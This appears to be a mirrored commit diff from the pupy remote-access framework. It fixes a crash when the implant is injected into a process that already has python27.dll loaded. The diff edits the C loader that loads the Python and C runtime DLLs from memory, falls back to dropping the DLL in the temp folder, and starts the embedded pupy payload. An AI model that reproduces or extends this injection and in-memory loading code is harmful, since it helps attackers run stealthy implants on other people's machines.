mirror of https://github.com/n1nj4sec/pupy.git
fixed a bug where injecting into a process with python27.dll already loaded crashed
This commit is contained in:
parent
76b6cd05e4
commit
bc4b324505
|
@ -1,3 +1,4 @@
|
|||
//#define VERBOSE
|
||||
#ifdef STANDALONE
|
||||
# include <Python.h>
|
||||
# include "Python-version.h"
|
||||
|
|
|
@ -64,6 +64,19 @@ int _load_python_FromFile(char *dllname)
|
|||
return 1;
|
||||
}
|
||||
|
||||
int _load_msvcr90(char *bytes)
|
||||
{
|
||||
HMODULE hmod;
|
||||
ULONG_PTR cookie = 0;
|
||||
cookie = _My_ActivateActCtx();
|
||||
hmod = MyLoadLibrary("msvcr90.dll", bytes, NULL);
|
||||
if (hmod == NULL) {
|
||||
return 0;
|
||||
}
|
||||
_My_DeactivateActCtx(cookie);
|
||||
return 1;
|
||||
|
||||
}
|
||||
int _load_python(char *dllname, char *bytes)
|
||||
{
|
||||
int i;
|
||||
|
|
|
@ -6,6 +6,7 @@ del *.exp
|
|||
del pupyx86.exe
|
||||
del pupyx86.dll
|
||||
|
||||
IF [%1]==[quick] GOTO compilation
|
||||
::First: generate resources :
|
||||
copy resources\python27_x86.dll resources\python27.dll
|
||||
%python_path% gen_library_compressed_string.py
|
||||
|
@ -16,14 +17,14 @@ copy resources\msvcr90_x86.dll resources\msvcr90.dll
|
|||
%python_path% gen_resource_header.py resources\msvcr90.dll
|
||||
%python_path% gen_python_bootloader.py
|
||||
%python_path% gen_resource_header.py resources\bootloader.pyc
|
||||
::compile them to obj files :
|
||||
|
||||
:compilation
|
||||
|
||||
%cl_path% /c resources_library_compressed_string_txt.c
|
||||
%cl_path% /c resources_bootloader_pyc.c
|
||||
%cl_path% /c resources_python27_dll.c
|
||||
%cl_path% /c resources_msvcr90_dll.c
|
||||
|
||||
::then compile
|
||||
|
||||
%cl_path% /c Python-dynload.c /IC:\Python27\include
|
||||
%cl_path% /c MemoryModule.c
|
||||
%cl_path% /c _memimporter.c /IC:\Python27\include
|
||||
|
|
|
@ -43,22 +43,35 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
char * ppath;
|
||||
FILE * f;
|
||||
char tmp_python_dll_path[MAX_PATH];
|
||||
//char tmp_manifest_path[MAX_PATH];
|
||||
char tmp_manifest_path[MAX_PATH];
|
||||
char tmp_path[MAX_PATH];
|
||||
ULONG_PTR cookie = 0;
|
||||
/*
|
||||
ACTCTX ctx;
|
||||
BOOL activated;
|
||||
HANDLE k32;
|
||||
//HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx);
|
||||
//BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie);
|
||||
//void (WINAPI *AddRefActCtx)(HANDLE hActCtx);
|
||||
//BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie);
|
||||
HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx);
|
||||
BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie);
|
||||
void (WINAPI *AddRefActCtx)(HANDLE hActCtx);
|
||||
BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie);
|
||||
*/
|
||||
PyGILState_STATE restore_state;
|
||||
|
||||
_load_python("msvcr90.dll", resources_msvcr90_dll_start); // needed for the python interpreter
|
||||
if(!GetModuleHandle("msvcr90.dll")){
|
||||
#ifndef QUIET
|
||||
fprintf(stderr,"loading msvcr90.dll\n");
|
||||
#endif
|
||||
_load_msvcr90(resources_msvcr90_dll_start);
|
||||
}
|
||||
else{
|
||||
#ifndef QUIET
|
||||
fprintf(stderr,"msvcr90.dll already loaded\n");
|
||||
#endif
|
||||
}
|
||||
|
||||
GetTempPath(MAX_PATH, tmp_path);
|
||||
//InitializeCriticalSection(&csInit);
|
||||
/*
|
||||
/*
|
||||
k32 = LoadLibrary("kernel32");
|
||||
CreateActCtx = (void*)GetProcAddress(k32, "CreateActCtxA");
|
||||
ActivateActCtx = (void*)GetProcAddress(k32, "ActivateActCtx");
|
||||
|
@ -80,7 +93,7 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
fprintf(f,"%s",resource_python_manifest);
|
||||
fclose(f);
|
||||
#ifndef QUIET
|
||||
printf("manifest written to %s\n",tmp_manifest_path);
|
||||
fprintf(stderr,"manifest written to %s\n",tmp_manifest_path);
|
||||
#endif
|
||||
ctx.lpSource = tmp_manifest_path;
|
||||
|
||||
|
@ -92,37 +105,55 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
#ifndef QUIET
|
||||
DeleteFile(tmp_manifest_path);
|
||||
#endif
|
||||
*/
|
||||
*/
|
||||
|
||||
if(!Py_IsInitialized)
|
||||
{
|
||||
int res=0;
|
||||
//activated = ActivateActCtx(MyActCtx, &actToken);
|
||||
if(!_load_python("python27.dll", resources_python27_dll_start)){
|
||||
|
||||
//cookie=_My_ActivateActCtx();
|
||||
if(GetModuleHandle("python27.dll")){
|
||||
HANDLE hp;
|
||||
#ifndef QUIET
|
||||
printf("loading python27.dll from memory failed\n");
|
||||
fprintf(stderr,"python27.dll is already loaded\n");
|
||||
#endif
|
||||
_load_python_FromFile("python27.dll"); // does not actually load a new python, but uses the handle of the already loaded one
|
||||
}
|
||||
else{
|
||||
if(!_load_python("python27.dll", resources_python27_dll_start)){
|
||||
#ifndef QUIET
|
||||
fprintf(stderr,"loading python27.dll from memory failed\n");
|
||||
#endif
|
||||
|
||||
//if loading from memory fail, we write dll on disk
|
||||
sprintf(tmp_python_dll_path, "%spython27.dll", tmp_path);
|
||||
//if loading from memory fail, we write dll on disk
|
||||
sprintf(tmp_python_dll_path, "%spython27.dll", tmp_path);
|
||||
|
||||
f=fopen(tmp_python_dll_path,"wb");
|
||||
res=fwrite(resources_python27_dll_start, sizeof(char), resources_python27_dll_size, f);
|
||||
fclose(f);
|
||||
f=fopen(tmp_python_dll_path,"wb");
|
||||
res=fwrite(resources_python27_dll_start, sizeof(char), resources_python27_dll_size, f);
|
||||
fclose(f);
|
||||
|
||||
if(!_load_python(tmp_python_dll_path, NULL)){
|
||||
if(!_load_python("python27.dll", NULL)){ // try loading from system PATH
|
||||
#ifndef QUIET
|
||||
printf("could not load python dll\n");
|
||||
#endif
|
||||
if(!_load_python(tmp_python_dll_path, NULL)){
|
||||
if(!_load_python("python27.dll", NULL)){ // try loading from system PATH
|
||||
#ifndef QUIET
|
||||
fprintf(stderr,"could not load python dll\n");
|
||||
#endif
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
#ifndef QUIET
|
||||
printf("python interpreter loaded\n");
|
||||
fprintf(stderr,"python interpreter loaded\n");
|
||||
#endif
|
||||
|
||||
}
|
||||
//_My_DeactivateActCtx(cookie);
|
||||
}
|
||||
#ifndef QUIET
|
||||
fprintf(stderr,"calling PyEval_InitThreads() ...\n");
|
||||
#endif
|
||||
PyEval_InitThreads();
|
||||
#ifndef QUIET
|
||||
fprintf(stderr,"PyEval_InitThreads() called\n");
|
||||
#endif
|
||||
if(!Py_IsInitialized()){
|
||||
ppath = Py_GetPath();
|
||||
strcpy(ppath, "\x00");
|
||||
|
||||
|
@ -131,21 +162,19 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
Py_Initialize();
|
||||
|
||||
#ifndef QUIET
|
||||
printf("Py_Initialize()\n");
|
||||
fprintf(stderr,"Py_Initialize()\n");
|
||||
#endif
|
||||
PySys_SetObject("frozen", PyBool_FromLong(1));
|
||||
}
|
||||
|
||||
|
||||
restore_state=PyGILState_Ensure();
|
||||
PySys_SetObject("frozen", PyBool_FromLong(1));
|
||||
|
||||
init_memimporter();
|
||||
#ifndef QUIET
|
||||
printf("init_memimporter()\n");
|
||||
fprintf(stderr,"init_memimporter()\n");
|
||||
#endif
|
||||
initpupy();
|
||||
#ifndef QUIET
|
||||
printf("initpupy()\n");
|
||||
fprintf(stderr,"initpupy()\n");
|
||||
#endif
|
||||
|
||||
//mod = PyImport_ImportModule("sys");
|
||||
|
@ -153,9 +182,8 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
//MessageBoxA(0, "hey ! :D", "DLL Message", MB_OK | MB_ICONINFORMATION);
|
||||
|
||||
/* We execute then in the context of '__main__' */
|
||||
PyEval_InitThreads();
|
||||
#ifndef QUIET
|
||||
printf("starting evaluating python code ...\n");
|
||||
fprintf(stderr,"starting evaluating python code ...\n");
|
||||
#endif
|
||||
//PyRun_SimpleString("print 'ok from python'");
|
||||
m = PyImport_AddModule("__main__");
|
||||
|
@ -184,7 +212,7 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
/*
|
||||
if (!DeactivateActCtx(0, actToken)){
|
||||
#ifndef QUIET
|
||||
printf("LOADER: Error deactivating context!\n!");
|
||||
fprintf(stderr,"LOADER: Error deactivating context!\n!");
|
||||
#endif
|
||||
}
|
||||
*/
|
||||
|
|
Loading…
Reference in New Issue